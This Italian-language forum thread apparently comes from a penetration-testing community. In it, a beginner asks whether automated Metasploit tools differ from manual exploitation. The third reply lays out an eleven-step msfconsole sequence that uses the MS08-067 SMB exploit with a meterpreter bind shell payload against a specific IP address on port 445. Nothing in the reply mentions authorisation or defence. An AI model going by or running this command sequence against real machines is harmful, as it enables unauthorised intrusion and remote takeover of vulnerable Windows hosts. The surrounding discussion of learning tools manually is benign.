Results 1 to 3 of 3

Thread: metasploit... fast track o a manina?

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    south america
    Posts
    7

    Default metasploit... fast track o a manina?

    Forse la mia Ú una domanda sciocca... ma avendo un host da testare per le vulnerabilitß, esiste qualche differenza nel risultato utilizzando fast-track, db_autopwn o nel fare delle scansioni e provare una a una le eventuali vulnerabilitß trovate?
    Immagino che l'unico vantaggio potrebbe essere il poter modificare alcune delle impostazioni di base di metasploit... perˇ questo puˇ cambiare il risultato del test?

    Altra cosa che non comprendo: il fatto che il sistema 'non' abbia vulnerabilitß (per metasploit ad esempio), escludendo l'ingegneria sociale, errori clamorosi di chi lo utilizza in configurazioni future del sistema, o malware etc scaricati navigando nel web, manomissione/modifiche diciamo hardware della rete del sistema in questione,... Ú possibile forarlo utilizzando tools particolari?

    Con meno perifrasi, esistono altre tecniche di hacking pi˙ avanzate? Non saprei come lavorare a 'mano' o vabbeh scrivendo ad hoc script per poter spiengere in remoto una macchina a funzionare in un certo modo per creare delle vulnerabilitß, o alcuni tipo di funzionamento anomalo che si possono sfruttare ?

    Come sempre grazie per la pazienza e spero di essermi potuto spiegare, come si nota dalle mie domande stˇ cercando di chiarirmi alcuni punti sul tema della sicurezza, di cui non sˇ quasi nulla...

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Default Re: metasploit... fast track o a manina?

    a manina impari qualcosa (vedi i servizi attivi sul tuo pc vittima, cerchi nella documentazione come funzionano, vedi le vulnerabilita' e ti sforzi di trovare il modo per sfruttarle), con fast track rimani al punto di partenza.

    Se vai di "manina" scopri anche che non c'e' solo metasploit framework al mondo...

  3. #3
    Junior Member
    Join Date
    Apr 2010
    Posts
    26

    Default Re: metasploit... fast track o a manina?

    Fast-track, db_autopwn non sono in grado di darti nessuna vulnerabilitÓ. Semmai sfruttano una vulnerabilita scoperta. Sempre chŔ il computer target non sia aggiornato. Una volta scoperta la vulnerabilitÓ con per esempio: Acunetix, nmap, Nessus ecc.solo allora ci puoi lavorare sopra. Ti faccio un esempio di come attaccare un pc con la porta 445 aperta:

    01)load msfconsole of metasploit
    02)msf> info exploit/windows/smb/ms08_067_netapi (Note: questo exploit pu˛ cambiare)
    03)msf> use exploit/windows/smb/ms08_067_netapi
    04)msf exploit(ms08_067_netapi) > show options
    05)msf exploit/ms08_067_netapi) > set RHOST 87.16.235.246 (Note: questo IP pu˛ cambiare)
    06)msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp (Note: questo exploit pu˛ cambiare)
    07)msf exploit(ms08_067_netapi) > show options
    08)msf exploit(ms08_067_netapi) > info
    09)msf exploit(ms08_067_netapi) > show targets
    10)msf exploit(ms08_067_netapi) > set target 25 (Note: questo numero pu˛ variare)
    11) msf exploit(ms08_067_netapi) > exploit

Similar Threads

  1. Fast-Track <-> Accediendo a un sistemas con Fast-Track
    By ÜěrτĦacK in forum BT Videos - ES
    Replies: 1
    Last Post: 06-26-2010, 05:57 AM
  2. Fast-track Help
    By Halfhigh in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-17-2009, 02:18 PM
  3. FTP& Fast-Track
    By malam in forum OLD Pentesting
    Replies: 0
    Last Post: 07-25-2009, 09:15 PM
  4. Fast-Track Metasploit Autopwn Auto
    By bonsai in forum OLD Newbie Area
    Replies: 3
    Last Post: 08-28-2008, 02:21 PM
  5. Fast-Track.py
    By theStonedHacker in forum OLD Newbie Area
    Replies: 1
    Last Post: 06-15-2008, 05:58 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •